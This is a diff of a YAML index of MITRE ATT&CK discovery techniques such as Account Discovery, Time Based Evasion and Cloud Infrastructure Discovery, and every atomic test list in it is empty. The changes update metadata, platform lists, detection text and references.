       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49067,12 +49767,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49083,7 +49782,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49098,7 +49796,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49146,7 +49843,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49218,12 +49916,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49265,122 +49962,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -49395,6 +50043,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -49404,9 +50058,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -49416,102 +50075,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -49565,7 +50259,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -49595,7 +50288,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -49633,12 +50326,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -49665,14 +50357,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -49701,7 +50392,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -49761,7 +50451,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -49780,7 +50470,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -49849,12 +50538,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -49931,40 +50619,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
